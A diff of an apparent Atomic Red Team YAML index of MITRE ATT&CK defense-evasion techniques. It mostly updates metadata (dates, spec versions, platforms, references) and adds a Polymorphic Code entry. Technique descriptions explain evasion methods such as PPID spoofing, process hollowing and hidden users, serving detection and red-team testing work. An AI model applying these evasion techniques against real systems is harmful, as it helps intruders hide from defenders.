       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -19410,8 +19518,6 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.012:
     technique:
@@ -19472,7 +19578,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.002:
     technique:
@@ -19545,7 +19650,7 @@ defense-evasion:
         <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation:
         Hide GDM User Accounts) Display Managers are not anchored to specific distributions
         and may be changed by a user or adversary."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T02:31:01.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -19574,7 +19679,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests:
     - name: Create Hidden User using UniqueID < 500
@@ -19706,11 +19810,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -19795,7 +19898,6 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests:
     - name: Disable history collection
@@ -20068,7 +20170,7 @@ defense-evasion:
           '
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -20143,45 +20245,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -20205,6 +20272,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -20215,9 +20285,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -20227,8 +20302,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -20285,7 +20387,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -20310,7 +20412,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests:
     - name: Parent PID Spoofing using PowerShell
@@ -20570,7 +20671,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20597,11 +20698,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20655,7 +20755,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -20691,7 +20790,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -20717,8 +20816,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -20744,7 +20841,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -20766,8 +20863,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -20833,7 +20928,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests:
     - name: Compiled HTML Help Local Payload
@@ -21083,7 +21177,7 @@ defense-evasion:
         name: command_prompt
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -21138,7 +21232,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests:
     - name: Add Network Share
@@ -21374,7 +21467,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests:
     - name: Disable syslog
@@ -22736,7 +22828,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -22771,8 +22863,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -22838,7 +22928,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -22864,7 +22953,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -22889,11 +22978,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -22910,7 +22998,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -22920,7 +23007,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -22929,19 +23016,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -22989,11 +23074,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -23061,18 +23147,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests:
     - name: Process Hollowing using PowerShell
@@ -23242,7 +23327,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -23264,7 +23349,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -23339,6 +23423,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -23398,7 +23483,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests:
     - name: Decode base64 Data into Script
@@ -23684,7 +23768,7 @@ defense-evasion:
         name: command_prompt
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -23713,24 +23797,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -23765,9 +23851,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -23790,7 +23873,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -23808,8 +23891,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -23848,7 +23929,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -23891,8 +23972,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests:
     - name: Register Portable Virtualbox
@@ -24056,6 +24135,76 @@ defense-evasion:
         cleanup_command: |-
           Stop-VM $VM -Force
           Remove-VM $VM -Force
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -24099,7 +24248,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
